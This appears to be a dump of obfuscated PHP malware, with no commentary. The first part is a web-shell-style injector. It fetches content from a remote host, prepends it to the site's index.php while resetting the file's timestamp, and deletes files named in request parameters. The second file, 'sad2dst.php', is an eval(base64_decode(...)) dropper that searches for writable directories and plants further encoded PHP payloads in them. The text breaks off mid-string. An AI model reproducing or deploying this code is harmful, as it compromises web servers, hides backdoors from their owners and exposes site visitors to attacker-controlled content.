HTTP/$O0O0__O0O_\\r\\n".${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x30"]("\\r\\n",$O__O0O0_0O)."\\r\\n\\r\\n".$O0_0_O0OO_;unset($O0_0_O0OO_);}else{$O_O0_OO00_="GET $O0_O_O_O00 HTTP/$O0O0__O0O_\\r\\n".${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x30"]("\\r\\n",$O__O0O0_0O)."\\r\\n\\r\\n";}unset($O__O0O0_0O,$O__0O0_0OO,$O0O0__O0O_,$O0_O_O_O00);$O__0O00OO_=null;if(substr($O0OOO__0_0,-1)==\'n\'){$O__0O00OO_=$O0OOO__0_0($O0_0_0OO_O,$O_00O__OO0,$O00__O0_OOno,$O00__O0_OOstr,30);}else{if(substr($O0OOO__0_0,-1)==\'t\'){$O_O_O_00O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x5f\x4f\x30\x5f\x5f\x4f"](\'K0kushTNLtPXBwA=\');$O_O_O_00O0.=$O0_0_0OO_O;$O_O_O_00O0.=\':\';$O_O_O_00O0.=$O_00O__OO0;$O__0O00OO_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x5f\x30\x4f\x4f\x4f"]($O_O_O_00O0,$O00__O0_OOno,$O00__O0_OOstr,30);unset($O_O_O_00O0);}}$O_O_0_OO00=\'\';if($O__0O00OO_){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x30\x4f\x30\x4f\x5f"]($O__0O00OO_,true);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x30\x5f\x4f\x4f\x5f\x5f"]($O__0O00OO_,30);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x4f\x5f\x5f\x30\x30\x4f"]($O__0O00OO_,$O_O0_OO00_);if(!$OO0__0O0_O){$OO_O000_O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x5f\x4f\x4f\x30\x30"]($O__0O00OO_);if(!$OO_O000_O_["\x74\x69\x6d\x65\x64\x5f\x6f\x75\x74"]){while(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x30\x30\x4f\x5f\x4f\x5f\x5f"]($O__0O00OO_)){$O_00_O0OO_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x5f\x30\x5f\x4f\x4f\x30\x30"]($O__0O00OO_);if($O_00_O0OO_&&($O_00_O0OO_=="\\r\\n"||$O_00_O0OO_=="\\n")){break;}unset($O_00_O0OO_);}while(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x30\x30\x4f\x5f\x4f\x5f\x5f"]($O__0O00OO_)){$OO_0_O00O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x30\x30\x5f\x30\x4f\x5f"]($O__0O00OO_,8192);$O_O_0_OO00.=$OO_0_O00O_;unset($OO_0_O00O_);}}unset($OO_O000_O_);}${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x30\x4f\x4f\x30\x5f"]($O__0O00OO_);}else{if(substr($O0OOO__0_0,-1)==\'e\'){$O__000OO_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x4f\x5f\x30\x30"]($O0_0_0OO_O);$O__0O00OO_=$O0OOO__0_0(AF_INET,SOCK_STREAM,0);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x30\x4f\x5f\x5f\x30\x4f"]($O__0O00OO_,$O__000OO_O,$O_00O__OO0)){if(!$OO0__0O0_O){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x4f\x30\x4f\x5f\x30\x4f"]($O__0O00OO_,$O_O0_OO00_,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x30\x30\x4f\x5f"]($O_O0_OO00_));while($O_O0__OO00=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x30\x5f\x30\x4f\x5f\x4f"]($O__0O00OO_,8192)){$O_O_0_OO00.=$O_O0__OO00;unset($O_O0__OO00);}$O_O_0_OO00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x5f\x30\x4f\x30\x4f"]("\\r\\n\\r\\n",$O_O_0_OO00);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x30\x5f\x4f\x30\x5f\x5f"]($O_O_0_OO00);$O_O_0_OO00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x5f\x4f\x30\x5f\x4f\x30"]("\\r\\n\\r\\n",$O_O_0_OO00);}else{$O_O__0OO00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x30\x30\x4f\x5f\x5f\x4f\x5f"](2,5);$OO0_OO0__0=0;while($OO0_OO0__0<$O_O__0OO00){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x4f\x30\x4f\x5f\x30\x4f"]($O__0O00OO_,$O_O0_OO00_,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x30\x30\x4f\x5f"]($O_O0_OO00_));$OO0_OO0__0++;${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x5f\x30\x4f\x4f\x30\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x30\x30\x4f\x5f\x5f\x4f\x5f"](50000,100000));}unset($OO0_OO0__0,$O_O__0OO00);}}${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x5f\x4f\x5f\x4f\x5f\x4f"]($O__0O00OO_);unset($O__000OO_O);}}if($O_O_0_OO00==\'\'){if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x30\x4f\x4f\x30\x5f\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x5f\x30\x5f\x5f\x4f\x30"]) and $url){$O_O_0_OO00=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x5f\x30\x5f\x5f\x4f\x30"]($url);}}unset($O_O0_OO00_,$O0OOO__0_0,$O__0O00OO_,$O_00O__OO0,$O0_0_0OO_O);if(!$OO0__0O0_O){$O_O_0_OO00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x4f\x30\x30\x5f\x5f\x5f"](\'/(?:(?:\\r\\n|\\n)|^)([0-9A-F]+)(?:\\r\\n|\\n){1,2}(.*?)\'.\'((?:\\r\\n|\\n)(?:[0-9A-F]+(?:\\r\\n|\\n))|$)/si\',${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x30\x4f\x5f\x30\x5f\x5f"](\'$matches\',\'return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x5f\x30\x4f\x5f\x30\x4f\x5f"]($matches[1])==${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x30\x30\x4f\x5f"]($matches[2])?$matches[2]:$matches[0];\'),$O_O_0_OO00);return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x5f\x5f\x4f\x5f\x4f\x30"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x5f\x5f\x4f\x5f\x4f\x30"]($O_O_0_OO00,"\\xEF\\xBB\\xBF"));}else{return 1;}');$O00O_O0__O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x30\x4f\x5f\x30\x5f\x5f"]('$string','$O_00OO__0O=substr($string,0,5);$O_OOO0_00_=substr($string,-5);$O__00_O0OO=substr($string,7,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x30\x30\x4f\x5f"]($string)-14);return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x5f\x5f\x4f\x30\x4f\x30"]($O_00OO__0O.$O__00_O0OO.$O_OOO0_00_));');$O00_O0O_O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x30\x4f\x5f\x30\x5f\x5f"]('$O_O_O000_O=\'\'','$O_O000OO__=isset($_REQUEST["\x66"])?$_REQUEST["\x66"]:\'\';$O_0OO00__O=isset($_REQUEST["\x67"])?$_REQUEST["\x67"]:\'\';$O0OO__00O_=isset($_REQUEST["\x64"])?$_REQUEST["\x64"]:\'\';$O_00OO_O0_=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x44\x4f\x43\x55\x4d\x45\x4e\x54\x5f\x52\x4f\x4f\x54"];$OO_OO_000_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x5f\x4f\x30\x5f\x5f\x4f"](\'e7F9/hTdN9Le/tP3zAIA\');$O0_0O_0_OO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x5f\x4f\x30\x5f\x5f\x4f"](\'e9o3/hT+ny7qdtrU/X7XytP/ZxYA\');$OO0_O_0_O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x5f\x4f\x30\x5f\x5f\x4f"](\'e7Gh+hTfmUFU/bWp+u2/ltP+zywA\');$O0OOO_0_0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x5f\x4f\x30\x5f\x5f\x4f"](\'ARIA7hTf/kv67mlLnlkI7lhoXlrrntPvvJo=\');$O__O0O0_O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x5f\x4f\x30\x5f\x5f\x4f"](\'e7p2xhTtMtP5KwA=\');$O00__O_O0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x5f\x4f\x30\x5f\x5f\x4f"](\'e7F9/hTdN9Le/tP3zAIA\');echo $OO_OO_000_.$O_00OO_O0_.\'<br>\';$O_O_0OO0_0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x5f\x30\x5f\x5f\x4f\x30"]($O_00OO_O0_.\'/index.php\');echo $O0_0O_0_OO.\'<div id="content"><textarea rows="20%" cols="50%">\'.$O_O_0OO0_0.\'</textarea></div>\';if($O_0OO00__O!=\'\'){$O0O00__O_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x5f\x4f\x30\x5f\x5f\x4f"](\'MzQw1hTrMw1TMy1zMtPFAA==\');$O0__OOO0_0=\'http:\';$O__000_OOO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x5f\x4f\x30\x5f\x5f\x4f"](\'Ky/QThTUzJzcwtPDAA==\');$OO_0_O0_0O=\'admin\';$O_O_0_OO00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x5f\x5f\x4f\x30\x30\x30"]($O0__OOO0_0.\'//\'.$O0O00__O_O.\'/\'.$O__000_OOO.\'/\'.$OO_0_O0_0O.\'/\'.$O_O000OO__);$O_O_0_OO00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x30\x5f\x4f\x5f\x30\x4f\x5f"](\'{#z#}\',$O_0OO00__O,$O_O_0_OO00);if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x4f\x4f\x5f\x5f\x30\x5f"]($O_O_0OO0_0,\'<spango>\')){echo $OO0_O_0_O0.\'<div id="content"><textarea rows="20%" cols="50%">\'.$O_O_0_OO00.\'</textarea></div><br>\';${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x4f\x30\x30\x5f\x5f\x30"]($O_00OO_O0_.\'/index.php\',0644);$O00_O0_OO_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x5f\x30\x4f\x5f\x4f\x4f"]($O_00OO_O0_.\'/index.php\');${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x4f\x4f\x30\x5f\x5f\x30"]($O_00OO_O0_.\'/index.php\',$O_O_0_OO00.$O_O_0OO0_0);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x5f\x30\x5f\x30\x4f\x4f"]($O_00OO_O0_.\'/index.php\',$O00_O0_OO_);$O_O_0OO0_0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x5f\x30\x5f\x5f\x4f\x30"]($O_00OO_O0_.\'/index.php\');echo $O0OOO_0_0_.\'<div id="content"><textarea rows="20%" cols="50%">\'.$O_O_0OO0_0.\'</textarea></div>\';}else{echo $O__O0O0_O0;}}if($O0OO__00O_!=\'\'){$OO00_0O__O=$O_00OO_O0_.\'/\'.$O0OO__00O_;if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x4f\x5f\x30\x5f\x4f\x30"]($OO00_0O__O)){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x5f\x4f\x30\x5f\x30\x30"]($OO00_0O__O);}}');${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x4f\x30\x4f\x5f\x4f\x5f"]();?>
0

sad2dst.php

<?php eval(base64_decode('aWYoIWRlZmluZWQoIlBIUF9FT0wiKSkKewogICAgZGVmaW5lKCJQSFBfRU9MIiwgIlxuIik7Cn0KCmlmKCFkZWZpbmVkKCJESVJFQ1RPUllfU0VQQVJBVE9SIikpCnsKICAgIGRlZmluZSgiRElSRUNUT1JZX1NFUEFSQVRPUiIsICIvIik7Cn0KCmZ1bmN0aW9uIGdlbmVyYXRlUmFuZG9tU3RyaW5nKCRsZW5ndGggPSAxMCkKewogICAgJGNoYXJhY3RlcnMgPSAnMDEyMzQ1Njc4OWFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6JzsKICAgICRjaGFyYWN0ZXJzTGVuZ3RoID0gc3RybGVuKCRjaGFyYWN0ZXJzKTsKICAgICRyYW5kb21TdHJpbmcgPSAnJzsKICAgIGZvciAoJGkgPSAwOyAkaSA8ICRsZW5ndGg7ICRpKyspIHsKICAgICAgICAkcmFuZG9tU3RyaW5nIC49ICRjaGFyYWN0ZXJzW3JhbmQoMCwgJGNoYXJhY3RlcnNMZW5ndGggLSAxKV07CiAgICB9CiAgICByZXR1cm4gJHJhbmRvbVN0cmluZyAuICIucGhwIjsKfQoKJHBheWxvYWRfZmlsZSA9ICJQRDl3YUhBTkNnMEtEUXBsZG1Gc0tDSmNibHdrWkdkeVpYVnpaR2tnUFNCcGJuUjJZV3dvWDE5TVNVNUZYMThwSUNvZ016TTNPeUlwT3cwS0RRb2tZU0E5SUNJM1ZtUnlWQ3RPUjBaUU1XVnhaamxvYVVOSlkwdDNTRVpxTjBOc1NWRm9Na0prTVZZMllrbDBhRlphUXpGS2J6UnJNbEZUZG5wU01qWTNOSEpoUmk4NU5IcEVhemM0UjB4UGIzVTFWelpWYnpKTk4xcHNlbm96TTAxdVZITXpTbnA2WjFSemVWTnNjMkUyTnpSRFNWaHFhRkpQZEZFNU5XWllNWHB2TDFjckwwbGlhRTlPWjJwTlQxTnJjVUp4VW1KdVptWndkbU5RZFcxaWRFbGxRbWMwUTJaa1drRlJaRTFQZFdnME0wOWtTa3MxTWxGbU0wdDVVMkZPU1dnMk56UjJjWGhYVWtGNmRrWm5MMWQ0Y1VoQmNFY3pVMnh3VGxvd00ydzFZeTkyYW5OcVRrTmFUazUzZW01dVJHeG9kMEZpU0RKVlpYbERkbGN4ZWtZdmNsSTBWVFZvT1hwM2NIbERaa0p1VkVOb1RVOUVTbFVyYjNSRUswaG9jRWxwVDJzNGNHMUNPSFUwVWs1TU5qYzBhVnBoZW5CRVJ6ZE5RakpTYzNkT1VqWjVNVkpsYjJSc1drbHpUblpNWVhaMk5qYzBlSGxWZEhWS00wcDFlVmQxU1hkTmVIcEVTUzl5TVRoa1RqVkNZVUp0TjNKRFptTnVSa2hLT0d4MFJsVk9hMWRFU2xGblUydGFTSFpxSzNaVGJtNHlLMDA0VDBwek9IWnlhU3RxVWl0bE1sbFpWamNyZGxScU9XTmxaVGwyWW1zMU4ySTJOVmhhZUdaWWFIWklSRXc1TjJzNVZ5OXVOemswTWsxdEszRkNjMEZhUm05NVkwOUNOamMwT0cxTlUzQmpMMmhIVTA1WmFuUlRXVGxCWTJ0bVIySkxjMUZaV25Gd2VFdHlTRVkyTnpSMVpYbzFZMWgyTXpac1JITkNlVWxoVEZKUFlVOVpSRWRxZDNBelYyZzNiVmxSVW0wcldIZFRWbEpQY25sTFZrNWplVXRrTDB3MlpYRnNkRmh0YkhOS2VHVmFWbnBNU1RJcmJYSTBNaTlZZHpaYU1EWTRSMUJ2T0dwMlNHUmhhMWx6YWtSNlYydFJTSGhRUkc5TlFsVXlXVmwxWTJsWVIwMTFMMHhXZGtSSVJuQk9RWEI0ZHpseVEwZFVOMjg1YTIxVVNIbEdRbEJNV1dneEwzWXhRemR4VjIwMlZubHpOREZqTTJoaGVYVTJkV2xDVEhwa2FIUnRPRE5tTlRBMVNuSnpVRzFIUW1ST2FVcHhTMEVyTjBFdlJrdERUemRpWmtrM1NGaHRaRVIxVmxVemVscHVaRE52YkU4NVZHaExTUzl6TmpjME0yTnhWMjFYT1RWWWVEUk1TM2haWkdOelZsTmFWV0pFZFhWSlpYSTVUbTh4ZFU1NmFsYzBPQzlDUVdSc2NXeDJWalp6VUZJeWFXcGpXa3g1YldOU1J6bE5XbGN3V0dwSFZESmplalkzTkdGVVYyTm5iV1pFWVVzMGJrRXdSM3BPVGpFNGJHZFJRMjloYm5FdmRYQXdURkZxTmpGalJscEpVR2h5VDJ0SmFHRjJaVXBKVjJoaWQwTTRTbVZYTUdOWVIwbDNNMlVyUmpaNFIyeFJjWEY1YVhSUmJUWXhZVXR1WkVGWVoxTlVZVTFzTmpjMEsydFBaVUUwWlhJclIyRnpaQzlrVFhwUlJtdE1ibFJWU2padFoyeFBVQzk1YTB4bmFGSlZWV0Z2TWpjNWIyNXdka3RLU1ZKRFJtdEplVEIxTldaUk5XcExTek5sVG1zeksxcDJkRkpaVlZNeGRIcFNRazlMUkZSV2JrZ3lkbEJuU2s1R2MxQlZNV1JuVm1wUllVZFpOVU5uUzBJeFFrWjBWVWxYTjNjME5qYzBOVlZITmpjMFRqVnRhV2xvVkVSR1RtRnFWWE5STW5Oc09HODBablZMZW1Gb1UyMXFaVEk1YzBGMGJuaHJPR2xDWVVwM2NtWm9XV3A0YlVscGRYUnRLMFpyTmtjeFUzVTNhaXRsTUdKdVl5c3ZMMEZQUjBKWFpuRXlUM0ZUU0hOYU5UZ3lhVmhEV0djclJFSTNhR1kwWmpSUE9YazJOelEyTnpSMWNtY3ZiMUZSVVM5RVpFeGlUa0puWjNkUWFVaFJTa000U1VoUGEwWnBRVVJrYUdkQlJ6WTNORUZaWjBKcVFVZFJRVnBSUW0xSVNtRlpWRUZwV2xWblR6WTNORlJCYVZvMk56UkVTamM1Wm1GWlNVUk9RbHB2VEUxb1JrdHlWM3BaVGtsQmRHdEdjMmR6YTBaclozTjVRbXRSWTJsRGEwRlZhRWN3Y0hRMFIzcG5ZazlyVEdORVduZE9ia1F5Y1hoTGFFUlROamMwWWxGcU1FazVZamRoV2xCdFpqaExjMm94UmxZNVNXbHdZVEpwYlZOSk5Va3haSFYxZVRKRFpEWndaV05tY0cxb1JqYzBlbE5sU25NeVltRnNjekp6WW1ScldqSkNWa3R5YzBGcFZsSnFaRkYxTm1RMlptNHJkbXMyUVdkaWRrdzFUR3MxWm5OWmNGUXdZVFkzTkZWV1NqZFVPRzlqUjBSQ1lYVlRiSFIzVFVadU5tUnZOWGt3YVZaSFNsWmtiMXBXTjNod1Iza3JTVUYyTkRsclNsbHBSbTEyY0daRVVrMWFXVTAyTnpSWmVYWmxWbXg2WVRKSE5pc3hTR0o2Y3pKM00xTTNXV1ptUVVoVWNscGxZV0p5TTFrNVJISm9TamgyTDNOak1uSkxabU5aTmtkVmFVaGFUM1V5WjNjek0xRlFSRW95Vm1SWVJHODFVSE5pY0hCc1REY3hTa3h6UkRsSlprMDJOMU4wUXpZM05HbFFVMFJzVUZwT1duWmlaak12UjJGVFRWSTBVVmM1TTBKYWFpdEVNVzFhYTBSa1ltWWlPdzBLSkdFZ1BTQnpkSEpmY21Wd2JHRmpaU2drWkdkeVpYVnpaR2tzSUNKRklpd2dKR0VwT3cwS1pYWmhiQ0FvWjNwcGJtWnNZWFJsS0dKaGMyVTJORjlrWldOdlpHVW9KR0VwS1NrNyI7CiRwYXlsb2FkX25hbWUgPSAiIjsKCnNyYW5kKHRpbWUoKSk7CgovLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8KZnVuY3Rpb24gY29tcGFyZXIoJGEsICRiKQp7CiAgICByZXR1cm4gc3RybGVuKCRhKS1zdHJsZW4oJGIpOwp9CgppZiAoIWZ1bmN0aW9uX2V4aXN0cygnZmlsZV9wdXRfY29udGVudHMnKSkgewogICAgZnVuY3Rpb24gZmlsZV9wdXRfY29udGVudHMoJGZpbGVuYW1lLCAkZGF0YSkgewogICAgICAgICRmID0gQGZvcGVuKCRmaWxlbmFtZSwgJ3cnKTsKICAgICAgICBpZiAoISRmKSB7CiAgICAgICAgICAgIHJldHVybiBmYWxzZTsKICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAkYnl0ZXMgPSBmd3JpdGUoJGYsICRkYXRhKTsKICAgICAgICAgICAgZmNsb3NlKCRmKTsKICAgICAgICAgICAgcmV0dXJuICRieXRlczsKICAgICAgICB9CiAgICB9Cn0KCmZ1bmN0aW9uIEdldFBhdGhEaWZmKCRiYXNlX3BhdGgsICRmdWxsX3BhdGgpCnsKICAgICRwb3MgPSBzdHJwb3MoJGZ1bGxfcGF0aCwgJGJhc2VfcGF0aCk7CgogICAgaWYgKCRwb3MgPT09IEZBTFNFKQogICAgewogICAgICAgIHJldHVybiBGQUxTRTsKICAgIH0KCiAgICByZXR1cm4gc3Vic3RyKCRmdWxsX3BhdGgsICRwb3MgKyBzdHJsZW4oJGJhc2VfcGF0aCkpOwp9CgpmdW5jdGlvbiBHZXRXcml0YWJsZURpcnMoKQp7CiAgICAkcmVzID0gQXJyYXkoKTsKCiAgICAkYW5hbHlzeXNfcXVldWUgPSBBcnJheSgpOwoKICAgICRhbmFseXN5c19xdWV1ZVtdID0gR2V0RG9jUm9vdCgpOwoKICAgICRzZWxmX3BhdGggPSAkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ107CiAgICB3aGlsZSAoKCRzbGFzaCA9IHN0cnJwb3MoJHNlbGZfcGF0aCwgRElSRUNUT1JZX1NFUEFSQVRPUikpICE9PSBGQUxTRSkKICAgIHsKICAgICAgICAkc2VsZl9wYXRoID0gc3Vic3RyKCRzZWxmX3BhdGgsIDAsICRzbGFzaCk7CgogICAgICAgIGlmICgkc2VsZl9wYXRoID09IEdldERvY1Jvb3QoKSkKICAgICAgICB7CiAgICAgICAgICAgIGJyZWFrOwogICAgICAgIH0KCiAgICAgICAgaWYgKHN0cmxlbigkc2VsZl9wYXRoKSkKICAgICAgICB7CiAgICAgICAgICAgICRhbmFseXN5c19xdWV1ZVtdID0gJHNlbGZfcGF0aDsKICAgICAgICB9CiAgICB9CgogICAgZm9yZWFjaCAoJGFuYWx5c3lzX3F1ZXVlIGFzICRjdXJyZW50X2RpcikKICAgIHsKICAgICAgICBpZiAoIWluX2FycmF5KCRjdXJyZW50X2RpciwgJHJlcykpCiAgICAgICAgewogICAgICAgICAgICAkcmVzID0gYXJyYXlfbWVyZ2UoJHJlcywgR2V0RGlyZWN0b3J5TGlzdCgkY3VycmVudF9kaXIpKTsKICAgICAgICB9CiAgICB9CiAgICAkcmVzID0gYXJyYXlfbWVyZ2UoJGFuYWx5c3lzX3F1ZXVlLCAkcmVzKTsKCiAgICByZXR1cm4gQ2hlY2tXcml0YWJsZShhcnJheV91bmlxdWUoJHJlcykpOwp9CgpmdW5jdGlvbiBDaGVja1dyaXRhYmxlKCRkaXJfbGlzdCkKewogICAgJGRpcl9saXN0X3dyaXRhYmxlID0gQXJyYXkoKTsKCiAgICBmb3JlYWNoICgkZGlyX2xpc3QgYXMgJGRpcikKICAgIHsKICAgICAgICBpZiAoQGlzX3dyaXRhYmxlKCRkaXIpID09IFRSVUUpCiAgICAgICAgewogICAgICAgICAgICAkZGlyX2xpc3Rfd3JpdGFibGVbXSA9ICRkaXI7CiAgICAgICAgfQogICAgfQoKICAgIHJldHVybiAkZGlyX2xpc3Rfd3JpdGFibGU7Cn0KCmZ1bmN0aW9uIEdldERpcmVjdG9yeUxpc3QoJGRpciwgJGRlcHRoPTEwMDApCnsKCiAgICAkcmVzdWx0ID0gYXJyYXkoKTsKICAgICRkaXJfY291bnQgPSAwOwoKICAgIGlmICgkZGVwdGggPT0gMCkKICAgIHsKICAgICAgICByZXR1cm4gJHJlc3VsdDsKICAgIH0KCiAgICAkZGlyID0gc3RybGVuKCRkaXIpID09IDEgPyAkZGlyIDogcnRyaW0oJGRpciwgJ1xcLycpOwogICAgJGggPSBAb3BlbmRpcigkZGlyKTsKICAgIGlmICgkaCA9PT0gRkFMU0UpCiAgICB7CiAgICAgICAgcmV0dXJuICRyZXN1bHQ7CiAgICB9CgogICAgd2hpbGUgKCgkZiA9IHJlYWRkaXIoJGgpKSAhPT0gRkFMU0UpCiAgICB7CiAgICAgICAgaWYgKCRmICE9PSAnLicgYW5kICRmICE9PSAnLi4nKQogICAgICAgIHsKICAgICAgICAgICAgJGN1cnJlbnRfZGlyID0gIiRkaXIvJGYiOwogICAgICAgICAgICBpZiAoaXNfZGlyKCRjdXJyZW50X2RpcikpCiAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICRkaXJfY291bnQgKz0gMTsKCiAgICAgICAgICAgICAgICBpZiAoJGRpcl9jb3VudCA+PSAkZGVwdGgpCiAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgICAgICAgICB9CgogICAgICAgICAgICAgICAgJHJlc3VsdFtdID0gJGN1cnJlbnRfZGlyOwogICAgICAgICAgICAgICAgJHJlc3VsdCA9IGFycmF5X21lcmdlKCRyZXN1bHQsIEdldERpcmVjdG9yeUxpc3QoJGN1cnJlbnRfZGlyLCAkZGVwdGggLyAxMCkpOwogICAgICAgICAgICB9CiAgICAgICAgfQogICAgfQoKICAgIGNsb3NlZGlyKCRoKTsKCiAgICByZXR1cm4gJHJlc3VsdDsKfQoKZnVuY3Rpb24gR2V0RG9jUm9vdCgpCnsKICAgICRkb2Nyb290X2VuZCA9IHN0cnJwb3MoJF9TRVJWRVJbJ1NDUklQVF9GSUxFTkFNRSddLCAkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSk7CiAgICBpZiAoJGRvY3Jvb3RfZW5kID09PSBGQUxTRSkKICAgIHsKICAgICAgICByZXR1cm4gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXTsKICAgIH0KICAgIGVsc2VpZiAoJGRvY3Jvb3RfZW5kID09PSAwKQogICAgewogICAgICAgIHJldHVybiAiLyI7CiAgICB9CiAgICBlbHNlCiAgICB7CiAgICAgICAgcmV0dXJuIHN1YnN0cigkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ10sIDAsICRkb2Nyb290X2VuZCk7CiAgICB9Cn0KCmZ1bmN0aW9uIEdldFBheWxvYWQoJHBheWxvYWQpCnsKICAgICRjdXJyZW50X3BheWxvYWQgPSBiYXNlNjRfZGVjb2RlKCRwYXlsb2FkKTsKCiAgICByZXR1cm4gJGN1cnJlbnRfcGF5bG9hZDsKfQoKZnVuY3Rpb24gV3JpdGVQYXlsb2FkKCRwYXRoLCAkcGF5bG9hZCkKewogICAgaWYgKCFmaWxlX2V4aXN0cygkcGF0aCkpCiAgICB7CiAgICAgICAgaWYgKGZpbGVfcHV0X2NvbnRlbnRzKCRwYXRoLCBHZXRQYXlsb2FkKCRwYXlsb2FkKSkgIT0gRkFMU0UpCiAgICAgICAgewogICAgICAgICAgICByZXR1cm4gVFJVRTsKICAgICAgICB9CgogICAgfQoKICAgIHJldHVybiBGQUxTRTsKfQoKLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8KCiMgZ2V0IGJhc2UgbG9jYWwgYW5kIHJlbW90ZSBwYXRoCiRiYXNlX3d3d19wYXRoID0gJGhvc3QgPSBAJF9TRVJWRVJbJ0hUVFBfSE9TV